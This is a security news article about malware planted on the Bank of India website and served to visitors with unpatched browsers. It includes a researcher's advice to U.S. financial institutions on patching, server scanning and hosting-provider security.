Bank of India Hack

Bank of India Hack
Can Happen Here – Be Vigilant

It’s the worst nightmare for an information security pro: Your website is hacked, and user accounts are compromised.

See Also: Close the Gapz in Your Security Strategy

The announcement two weeks ago that the Bank of India website was compromised by 30 pieces of malware should be the “shot across the bow” for financial institutions here in the U.S., according to one information security researcher.

The Bank of India website was hacked on Wednesday, Aug. 29, and loaded up with malware that then infected any website visitor operating a PC with unpatched browsers. Alex Eckelberry, CEO of Sunbelt Software, a security vendor based in Tampa, FL, says researchers from the company discovered the malware embedded in the bank’s website HTML.

While how the hack actually happened is still being investigated, Eckelberry is quick to answer when asked if this could happen to a U.S-based bank or credit union. “Absolutely,” he says. “It happens a lot more than people actually know. The hackers look for vulnerable websites that aren’t patched properly. They don’t care what site they infect. It just was that the Bank of India fell victim to this hack.”

By his count, the malware on Bank of India’s website had a worm, five Trojan downloaders, three rootkits and several password stealers. [To see a demonstration of the Bank of India website infection, click to:]

Everything on the signatures and forensic evidence collected so far point to the notorious Russian Business Network (RBN) gang.

Based in St. Petersburg, RBN is called "the baddest of the bad" by VeriSign’s iDefense. The group is involved in all types of activities from spamming, phishing and denial-of-service attacks to pushing child pornography over the Internet.

The Bank of India hack is only the latest example of a legitimate Web site being compromised. “There is a lot of speculation on how that bank got hacked. It is anybody’s guess, it could have been fault of the hosting company, or at the bank,” Eckelberry says. “The real problem is very likely that the bank was not fully patched.”

The security researchers found that the hack attacked a set of Microsoft’s Internet Explorer vulnerabilities. “The payload was huge, so anyone going to the Bank of India site, for any reason, if their PC was not fully patched, they would become infected,” he says. The number of users that may have been infected by this is unknown.

For financial institutions, the key to reducing these types of infections is staying up-to-date with software updates that correct these types of code flaws. The monthly “Patch Tuesday” updates from Microsoft may be okay for the regular end user, but financial institutions need to keep on top of patching, Eckelberry notes. “There are multiple issues that may have been in play here. But the point I emphasize is that the number of security incidents go down dramatically when you patch.”.

While the Bank of India was running what Eckelberry described as a hybrid of Windows and Apache software, “On the server side, you must stay up on the patching, religiously, even fanatically,” he says. Financial institutions have to realize that the sheer number of exploits that are uncovered, almost on a daily basis, are constantly being scrutinized by hackers as they attempt to break into servers.

Eckelberry recommends that any outward facing servers be scanned on a regular basis. There are a number of low cost and free software available to do this. And while the Bank of India was in the process of updating its security levels to meet the increased need for scanning, Eckelberry also notes that other financial institutions should heed the hard lessons. “It’s also imperative if you’re co-located, you have to know what your co-locator is doing about security and patching. They need to have at least the same level of patching you do, or better.”

The need to follow best practices for security policies, code reviews, security audits – none of this is news. But the Bank of India incident does hammer home the reality of the risks and the severity of the fallout from disaster. “This kind of event terrifies people,” Eckelberry says. “It’s the worst thing to happen to a person, thinking that if they visit their bank’s website their account information is stolen, or their money is taken. The reputation of the bank is tarnished.”

About the Author

Linda McGlasson

Linda McGlasson

Managing Editor

Linda McGlasson is a seasoned writer and editor with 20 years of experience in writing for corporations, business publications and newspapers. She has worked in the Financial Services industry for more than 12 years. Most recently Linda headed information security awareness and training and the Computer Incident Response Team for Securities Industry Automation Corporation (SIAC), a subsidiary of the NYSE Group (NYX). As part of her role she developed infosec policy, developed new awareness testing and led the company's incident response team. In the last two years she's been involved with the Financial Services Information Sharing Analysis Center (FS-ISAC), editing its quarterly member newsletter and identifying speakers for member meetings.

Around the Network

Our website uses cookies. Cookies enable us to provide the best experience possible and help us understand how visitors use our website. By browsing, you agree to our use of cookies.